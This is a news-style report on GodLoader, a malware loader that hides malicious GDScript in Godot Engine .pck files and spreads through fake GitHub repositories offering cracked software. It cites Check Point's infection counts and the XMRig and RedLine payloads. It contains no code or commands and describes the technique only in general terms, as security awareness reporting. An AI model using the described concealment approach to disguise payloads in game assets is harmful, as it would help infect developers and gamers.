Threat actors have recently devised a clever new method for deploying malware across various operating systems and platforms. This new malware loader, known as GodLoader, leverages the popular open-source game engine Godot Engine to deliver malicious code to unsuspecting victims. The deployment of GodLoader is facilitated through the Stargazers Ghost Network, a network of GitHub accounts and repositories that provide malware distribution as a service.
According to researchers at Check Point, over 17,000 machines have already fallen victim to GodLoader. Developers, in particular, are at heightened risk due to their frequent use of open-source platforms like Godot Engine for game development. The potential for inadvertently incorporating malicious code into their projects poses a significant concern. Additionally, gamers downloading and installing games created with compromised tools may unknowingly expose themselves to security risks.
One of the key aspects of GodLoader is its utilization of the Godot Engine’s capabilities. The threat actors behind this scheme exploited the engine’s use of .pck files, which bundle game assets and scripts for distribution. By embedding malicious GDScript within these files, the attackers can execute various malicious activities while evading detection. GDScript’s functionalities, such as anti-sandbox measures and remote payload execution, enable the malware to operate covertly.
The researchers discovered that the threat actors initially targeted Windows machines but also developed proof-of-concept loaders for macOS and Linux. While an Android loader is theoretically feasible with modifications to the Godot Engine, an iOS version is less likely due to Apple’s stringent App Store policies. The distribution of GodLoader through the Stargazers Ghost Network capitalizes on users’ familiarity with browsing GitHub for software packages and cheats.
The distribution strategy employed by the threat actors involved the use of approximately 200 repositories and over 225 Stargazer Ghost accounts. Victims were lured into downloading what they believed to be cracked versions of paid software or key generators, only to unwittingly install GodLoader. Once executed, GodLoader proceeded to install either the XMRig cryptocurrency miner or the RedLine infostealer. Despite the malicious nature of GodLoader, it managed to evade detection by antivirus tools since at least June 29, 2024.
The combination of targeted distribution tactics and stealthy deployment techniques has led to a high infection rate among victims. Check Point researchers warned that almost all antivirus engines in VirusTotal have failed to detect the presence of GodLoader. This underscores the need for heightened awareness and vigilance among users, especially developers and gamers who may be susceptible to such attacks.
In conclusion, the emergence of GodLoader as a malware delivery mechanism highlights the evolving tactics employed by threat actors to infiltrate systems and compromise user data. The utilization of legitimate software platforms like Godot Engine for malicious purposes underscores the importance of robust security measures and regular software updates to mitigate the risk of malware infections. Vigilance and caution are paramount in safeguarding against emerging cyber threats in the digital landscape.